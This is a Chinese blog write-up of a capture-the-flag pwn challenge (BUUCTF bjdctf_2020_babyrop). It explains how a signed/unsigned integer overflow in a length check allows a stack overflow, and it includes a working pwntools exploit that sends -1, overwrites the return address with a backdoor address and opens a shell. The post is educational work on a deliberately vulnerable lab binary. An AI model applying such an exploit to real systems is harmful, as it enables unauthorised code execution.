pwn刷题num39----整数溢出

最新推荐文章于 2024-07-06 10:16:19 发布
最新推荐文章于 2024-07-06 10:16:19 发布
阅读量459 收藏 4
点赞数
分类专栏: BUUCTF pwn CTF 文章标签: 系统安全 c语言 python 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tbsqigongzi/article/details/124543018
版权
pwn 同时被 3 个专栏收录
67 篇文章 5 订阅
订阅专栏
CTF
61 篇文章 1 订阅
订阅专栏
BUUCTF
36 篇文章 0 订阅
订阅专栏

BUUCTF-PWN-bjdctf_2020_babyrop

在这里插入图片描述

首先查保护–>看链接类型–>赋予程序可执行权限–>试运行

64位程序,小端序
开启部分RELRO-----got表可写
未开启canary保护-----存在栈溢出
开启NX保护-----堆栈不可执行
未开启PIE-----程序地址为真实地址
动态链接

ida看一下主函数
在这里插入图片描述

char buf; // [rsp+0h] [rbp-10h]
.....
......
......
........
if ( (signed int)nbytes > 10 )
  {
    puts("Oops,u name is too long!");
    exit(-1);
  }
  puts("[+]What's u name?");
  read(0, &buf, (unsigned int)nbytes);

思路

这里nbytes是read函数输入的字符串大小,buf有0x10字节大小,而输入的nbytes如果大于10就会退出程序,注意观察发现存在整数溢出, (signed int)nbytes > 10 与read(0, &buf, (unsigned int)nbytes);
如果输入的nbytes二进制数最高位为1,有符号整形会把最高位当做标志位为负,除去最高位只要数不大于10即可跳过if的判断,然后执行read函数,发生栈溢出,查找一下有后门函数
在这里插入图片描述
exp

from pwn import *
context(os = 'linux',endian = 'little',log_level = 'debug',arch = 'amd64')
sh = remote('node4.buuoj.cn',29172)
system_addr = 0x40072A 
sh.recvuntil('name:')
sh.sendline('-1')
sh.recvuntil('name?')
payload = flat(['a' * 0x18,system_addr])
sh.sendline(payload)
sh.interactive()

运行获得flag
在这里插入图片描述
在这里插入图片描述

tbsqigongzi
关注
专栏目录
PWN-整数溢出
山高路远
04-06 940
整数溢出 基础知识 数据类型以及所取的范围(环境为64位下使用gcc-5.4) 类型 字节 范围 short int 2byte(word) 0~32767(0~0x7fff) -32768~-1(0x8000~0xffff) unsigned short int 2byte(word) 0~65535(0~0xffff) int 4byte(dword) 0~2147483647(0~0x7fffffff) -2147483648~-1(0x80000000~0xfffffff
pwn 整型溢出
清霂的博客
03-09 473
目录int_overflow 攻防世界r2t3 BUUoverflow int_overflow 攻防世界 file checksec ida32,进入login 输入一个用户名,再输入一个passwd,都无法直接栈溢出,进入check_passwd 发现v3是输入passwd的长度,v3是unsigned __int8类型范围是0~255 如果s的长度超过255,会变为(对s长度取模运算)得到的值。而s的长度不能大于0x199(409),取模后 v3>3&&v3<=
1.pwn的汇编基础(提及第一个溢出整数溢出
最新发布
2301_80361487的博客
07-06 1625
RIP指针用于存储CPU下一条将会执行的指针,不能直接修改,正常情况下会每一次运行一条指令自增一条指令的长度,当发生跳转时才会以其他形式改变其值。深入底层后,计算机其实很笨,只能完成一些很基本的操作,但是速度很快机器码就是一个个01组成的,为了方便人类阅读,一般都以16进制呈现。高级语言经过编译之后,经过编译器处理,被打包成一个可执行文件的格式,RSP为栈顶指针,RBP为栈底指针,二者用于维护程序运行时的函数,在之后的调用约定一节会对其进行讲解。在当前主流的操作系统中,都是以字节(B)为寻址单位进行寻址,
PWN整数溢出
qq_74259765的博客
11-19 689
转自ctfwiki-整数溢出部分
pwn学习(整数溢出
至臻求学,胸怀云月
01-31 3116
整数溢出 ctf-wiki基础知识 请先浏览上述链接 类型 字节 范围 short int 2byte 0~0x7fff 0x8000~0xffff unsigned short int 2byte 0~0xffff int 4byte 0~0x7fffffff 0x80000000~0xffffffff unsigned int 4byte 0~0xffffffff ...
adworld攻防世界-pwn-新手区-wp
令则
03-05 1163
adworld-pwn-新手区 tcl 到现在才算是正经昨晚攻防世界的pwn新手区, 整理wp: 题目文件: https://www.jianguoyun.com/p/DSZC7xcQg9bmBxjp5eoC (访问密码:emFwst) 这其中利用到的相关漏洞: 格式化字符串、栈溢出、伪随机数覆盖种子、整数溢出 另外由于自己的exp设置好模板等, 基本都是一个比较大的框架里,每个exp都比较...
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2075
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
pwn学习-攻防世界(一)
qq_45653588的博客
12-20 857
文章目录0x00 forgot0X01 dice_game0x02 Mary_Morton0x03 warmup 0x00 forgot 下载文件,检查文件保护机制,只开启了NX保护的32位文件。 拖入ida反编译一下,好多函数。。 先输入一个参数s,然后给出了函数sub_8048654()的地址,然后输入参数v2的值,进入for循环。判断v0的值和v2的长度,v0大于等于v2退出循环。 接下来是switch语句,参数为v14,初始为1,退出switch后,会执行(*(&v3 + --v14))()
BugKu做题记录【pwn】(持续更新中)
Assassin
04-06 3810
文章目录repeater1.题目分析2.我的错误思路3.正确思路4.利用代码5.知识点总结 好久不做题了,刚刚开始的签到题就做了三天,感觉水平确实下降得太厉害了,恢复训练~ ** ** repeater 1.题目分析 题目逻辑非常简单,就是read函数输入内容,然后printf输出,经过观察和简单得调试,我们需要注意到几个内容 pinrtf存在格式化字符串漏洞 read长度为0x64,不足以造成栈溢出 经过权限查询发现开启了NX保护,RELRO是部分开启,也就是堆栈不可执行 经过查看,bss段不可执
ctf-pwn:canary绕过
chennbnbnb的博客
01-19 3018
文章目录覆盖00字符读出canary原理利用条件漏洞代码编译选项EXP利用格式化字符串漏洞读出canary原理漏洞代码编译选项EXP逐字节猜解canary原理漏洞代码编译EXPSSP Leak原理 覆盖00字符读出canary 原理 canary的值设计为以0x00结尾,防止read,printf灯函数直接读出 通过栈溢出覆盖最低位的字节,从而获得canary 利用条件 存在read/pri...
Pwn_整数溢出
m0_56897090的博客
08-18 220
调用者: 被调用函数: 条件:size=0 | i=0 为什么i <= (size-1)能通过呢? 原来是[[整数溢出]],(size-1)该变量的类型原先是无符号整数(unsigned int64) ↓ 当size=0,size=size-1=-1(0xffff),汇编对于无符号负数转换:下界溢出 -1转换为无符号数是4294967295 所以i<=(size-1) ...
buuctf pwn (第三波)学会利用整数溢出
月阴荒的博客
04-04 737
bjdctf_2020_babystack2 https://www.cnblogs.com/bhxdn/p/12331035.html
PWN-整型溢出-攻防世界-PWN-int_overflow
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
09-24 1998
目录 整型溢出漏洞是什么 攻防世界-PWN-int_overflow exp 整型溢出漏洞是什么 整型是一个特定的变量类型,在32位的系统中,一个整数一般占32位,而在64位的系统中一个整数占64位,(下面主要介绍32位整型溢出)为了表示正负(有符号),需要最高位来决定数值的,下面列举一些常见的整型的数值范围 在c语言中有这样的规定: 对于unsigned整型溢出溢出之后的数会和2^(8*字节)作模运算,例如一个unsigned char 溢出了,就会把溢出的数值与256求模 .
pwn学习笔记3】整数溢出(攻防世界新手pwn题)
weixin_45927195的博客
03-14 723
利用整数溢出 先检查防御机制,开启了NX保护,即堆栈不可执行。 先试着随便输入些字符,发现选择1后共输入2次,而且success了。 用ida查看主函数,既然只能选择1那就查看选择1后执行的函数login()。输入的buf规定长度为0x199u,即409。 继续查看check_passwd()函数。因为v3只有一个字节,可想到当传入的密码长度足够长时可以利用整数溢出的原理,使其统计的长度仍在...
简单的整数溢出
Pwnpanda的博客
12-14 2892
首先说一下原理 为什么会出现整数溢出? 因为机器底层只能处理01串,也就是说底层本身是无法识别有符号数和无符号数的,这些规定是存在于编辑器层面,在C语言中,整数的基本类型有以下几种(图片来源:CTF Wiki) 溢出又分上溢出和下溢出溢出: 当出现0x7fff+1,或者0xffff+1的时候,假设0x7fff是无符号数,那么+1之后就是0 下溢出: 例如0x0000-1 -&gt; 0xff...
PWN · IntegerOverflow & ret2text】[BJDCTF 2020]babystack2.0
Mr_Fmnwon的博客
05-27 1093
整数溢出漏洞——对于有/无符号数,长/短位宽转换时机器码的变换策略所指。整数溢出一般与其他堆栈溢出相结合,然而其中的内容其实远不止这些,还需要深层次刷题,进一步掌握了解整数溢出
BUUCTF-pwn2_sctf_2016(整数溢出+泄露libc)
半岛铁盒的博客
08-02 541
32位开启了nx保护 没有看到system和‘/bin/sh’,开启了NX保护,是泄露libc类型的题目 main函数就调用了一个vuln函数 7行的输入函数不是get,是程序自定义的函数get_n a2传入的值类型是unsigned int,而前面判断长度的类型是int,可以规避长度限制。也就是说我们这边可以输入负数来达到溢出的效果(整数溢出) 一开始输入负数,绕过长度限制,造成溢出 利用printf函数泄露程序的libc版本,去算出system和‘/bin/sh‘的地址 溢出覆盖返回地址去执行sy
攻防世界pwn-forgot
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值